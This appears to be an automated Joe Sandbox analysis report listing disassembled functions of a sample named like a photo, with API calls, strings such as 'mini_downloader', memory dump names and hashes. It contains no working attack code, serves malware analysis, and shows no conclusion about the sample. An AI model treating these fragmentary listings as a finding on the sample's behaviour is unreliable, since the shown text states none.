                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: RectWindow
                                                                • String ID: file='progress_fore.png' source='0,10,470,16' dest='0,0,%d,6' $%d%%
                                                                • API String ID: 861336768-3757185858
                                                                • Opcode ID: 8fae7432c6af04401c4d5ecf1d430c39d317870633ae51a3fc0436de0046647b
                                                                • Instruction ID: cc5740df70e706bac23ff0d3d2e5de3619a91c72354914405da6b6b219a919d6
                                                                • Opcode Fuzzy Hash: 8fae7432c6af04401c4d5ecf1d430c39d317870633ae51a3fc0436de0046647b
                                                                • Instruction Fuzzy Hash: D061CD71E012059FDB00AFA5C985ADDBBB1FF08310F1544BAEC05BB2AADB359850CFA4
                                                                Function 00446D80 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: <_
                                                                • API String ID: 176396367-1213388361
                                                                • Opcode ID: 0bd0f7fa02285545634b497ce294350f13532a4edf59b9c84f9c3e867973a306
                                                                • Instruction ID: 8e92847b1ecd90ba99e5e5b3fdf63f2bf12c4522f611cd19b3d9e167c0a456d9
                                                                • Opcode Fuzzy Hash: 0bd0f7fa02285545634b497ce294350f13532a4edf59b9c84f9c3e867973a306
                                                                • Instruction Fuzzy Hash: C451E571E002089BDF10DFA9C845A9FB7B5EF45324F15862FE815A7384DB38AD05CB8A
                                                                Function 0045AF70 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Xinvalid_argument_wcslenstd::_
                                                                • String ID: list<T> too long
                                                                • API String ID: 3409107955-4027344264
                                                                • Opcode ID: 1fc3c69dea8ba95a2a2da6acec5045e109e0d2ee062a9902ef29bc31ac438c00
                                                                • Instruction ID: ed8ba93ec20549acd0ac4183584e71a6665858bf11ab06c43ba49b9d4d63023d
                                                                • Opcode Fuzzy Hash: 1fc3c69dea8ba95a2a2da6acec5045e109e0d2ee062a9902ef29bc31ac438c00
                                                                • Instruction Fuzzy Hash: E451A1715042409FCB00EF25C895A9B77E4FF89714F04467EFC599B386DB38A908CBA6
                                                                Function 00434E94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00434E9B
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                  • Part of subcall function 00444AB5: _memset.LIBCMT ref: 00444AF5
                                                                  • Part of subcall function 0043542D: __wcsicoll.LIBCMT ref: 00435444
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3__wcsicoll_malloc_memset
                                                                • String ID: align$left
                                                                • API String ID: 2193025624-3151061993
                                                                • Opcode ID: c6685021e1404281075817b5f16e0af5007855aeb9d14c50299857c35194158e
                                                                • Instruction ID: 045ad59ea4a030a2966c340403db59e60c9a81628d2885f77792092ec1b0b83b
                                                                • Opcode Fuzzy Hash: c6685021e1404281075817b5f16e0af5007855aeb9d14c50299857c35194158e
                                                                • Instruction Fuzzy Hash: 0E616070700742EFDB08DF74C884BD8FBA1BF0A304F1445AEE5299B692CB796950DB56
                                                                Function 0045AB10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Xinvalid_argument_wcslenstd::_
                                                                • String ID: list<T> too long
                                                                • API String ID: 3409107955-4027344264
                                                                • Opcode ID: 0a641990314885bffcd9878c5a9d07f239df4283c0680676a64eee8ebcde0a7e
                                                                • Instruction ID: 90a11c01f09f310ddbaeb531049eb93290b0ce92526aafc8c62cb8df714a0e73
                                                                • Opcode Fuzzy Hash: 0a641990314885bffcd9878c5a9d07f239df4283c0680676a64eee8ebcde0a7e
                                                                • Instruction Fuzzy Hash: CD51D675A002049FDB04EF64C985BDE77B5EF49304F04467EED156B382DB38A908CBA6
                                                                Function 0044C5F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0044C190: _wcslen.LIBCMT ref: 0044C1E7
                                                                • _wcslen.LIBCMT ref: 0044C650
                                                                  • Part of subcall function 0044C760: _memmove.LIBCMT ref: 0044C80A
                                                                • _memmove.LIBCMT ref: 0044C6DE
                                                                  • Part of subcall function 00401A8E: std::_Xinvalid_argument.LIBCPMT ref: 00401AA7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memmove_wcslen$Xinvalid_argumentstd::_
                                                                • String ID: about_protocol
                                                                • API String ID: 3789434609-2229189925
                                                                • Opcode ID: 7c0aa7eab867c54cd10040c1857400ffd721752cc4a8d80d821d71bc7bbdc213
                                                                • Instruction ID: e1d871a6e1734c1c2073ef18ee73c04df88bc666e2f09082ffb1683a559d6b06
                                                                • Opcode Fuzzy Hash: 7c0aa7eab867c54cd10040c1857400ffd721752cc4a8d80d821d71bc7bbdc213
                                                                • Instruction Fuzzy Hash: 6C4170B1E012059BDB10EFA9D8859AEFBB4FF04314F14492FE415A7340D778A954CBA6
                                                                Function 004134C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CountStateTick
                                                                • String ID: RichEditUI
                                                                • API String ID: 2629120050-2796277332
                                                                • Opcode ID: 5b5bb6abb4e2c363f554cf6a72af25211df1c51c817c11ae3c3abafa3e428632
                                                                • Instruction ID: 83ef7796f5161746cc6d1bce4ede715d4289c1d2664a0ef5eee57db86070cd52
                                                                • Opcode Fuzzy Hash: 5b5bb6abb4e2c363f554cf6a72af25211df1c51c817c11ae3c3abafa3e428632
                                                                • Instruction Fuzzy Hash: 81419F34600705AFDB20DF68C448BEEBBF1FF49705F14846AE8469B360C779AA85CB95
                                                                Function 004877B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %#.16g$0
                                                                • API String ID: 233258989-3304050424
                                                                • Opcode ID: 9f4aacc68dc2c8cd7a03ae82a23b271d3e2282bdba269dfbf307a4ac471c1ca7
                                                                • Instruction ID: 664d732bc5e698ae9b793c7394b171f357736a4575acbbbda995b5c51b33063a
                                                                • Opcode Fuzzy Hash: 9f4aacc68dc2c8cd7a03ae82a23b271d3e2282bdba269dfbf307a4ac471c1ca7
                                                                • Instruction Fuzzy Hash: 9741D3305082488FD725FF64C568AEFBBF6AB09340F644DAEC4829B201D735EA0CC7A5
                                                                Function 004107EF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset
                                                                • String ID: %s\zminstall_%d.ini$.tmp
                                                                • API String ID: 2102423945-977425666
                                                                • Opcode ID: 6ed1a8b1f873caf56b3190f705f715686a648ef4044bd3897101230d2212c4f5
                                                                • Instruction ID: df4fcf448fbd60ce8aa931f57924f730f713e7cd30957b703d793225db898fb5
                                                                • Opcode Fuzzy Hash: 6ed1a8b1f873caf56b3190f705f715686a648ef4044bd3897101230d2212c4f5
                                                                • Instruction Fuzzy Hash: AC41B276900208ABDB10DF51CC81EEE77B8FB44314F1046BBF91997291DB78AA84CFA4
                                                                Function 0045F3A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memmove_strlen
                                                                • String ID: core\ProtoValue.cpp
                                                                • API String ID: 1440245251-3700165167
                                                                • Opcode ID: 93c060710cb014316aa61e75d13e9a11cddae5a239164700fdc67a316ea34b07
                                                                • Instruction ID: 4a1b0aaec2212b1d43f56b5a5d1d9977ba7502d0c73db88e27af00dcdef68151
                                                                • Opcode Fuzzy Hash: 93c060710cb014316aa61e75d13e9a11cddae5a239164700fdc67a316ea34b07
                                                                • Instruction Fuzzy Hash: 1E319EB1D00204DBDB14EF65D845A9EB7F5FF49308F004A2EE80557201EB79AA58CBEA
                                                                Function 00446260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _strlen.LIBCMT ref: 004462A6
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000020,?,?,1.0.2|mini_downloader,00000000,000000FF), ref: 0044630C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide_strlen
                                                                • String ID:
                                                                • API String ID: 550581524-3916222277
                                                                • Opcode ID: c1bac1d49e37dd083cb9f27f8f7e7f8d497ec2ffa8bf1db307c00ce7c8e89397
                                                                • Instruction ID: fd4a7333e977114088690cbc5925fe774b23d1943b82e7003d6ba572a0dc867f
                                                                • Opcode Fuzzy Hash: c1bac1d49e37dd083cb9f27f8f7e7f8d497ec2ffa8bf1db307c00ce7c8e89397
                                                                • Instruction Fuzzy Hash: 5621E6B1A04244AFEB24DF58D845B2FBBF8FB44704F00056FE405D7781D7B9A9088765
                                                                Function 0046E190 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • std::exception::exception.LIBCMT ref: 0046E25B
                                                                • __CxxThrowException@8.LIBCMT ref: 0046E270
                                                                  • Part of subcall function 00469F30: InitializeCriticalSection.KERNEL32(0045C9D2,?,?,?,759113C0,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00469FFF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CriticalException@8InitializeSectionThrow_mallocstd::exception::exception
                                                                • String ID: 2+@
                                                                • API String ID: 2633512587-3624031253
                                                                • Opcode ID: 636fd6ca9df59e3a8c5a06a0b2953025a1ae0a28afab7cb9548a6d2d5c9d3062
                                                                • Instruction ID: d02135e466458ceaf4d75bb1a2099a67cbf0e206e4e654f343971e4a2f186f58
                                                                • Opcode Fuzzy Hash: 636fd6ca9df59e3a8c5a06a0b2953025a1ae0a28afab7cb9548a6d2d5c9d3062
                                                                • Instruction Fuzzy Hash: C231C1B09007059FCB10EF69DC51A9EBBF9FB45710F10462FE415A3380E7B9AA04CB96
                                                                Function 0045C940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • std::exception::exception.LIBCMT ref: 0045CA0B
                                                                • __CxxThrowException@8.LIBCMT ref: 0045CA20
                                                                  • Part of subcall function 00469F30: InitializeCriticalSection.KERNEL32(0045C9D2,?,?,?,759113C0,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00469FFF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
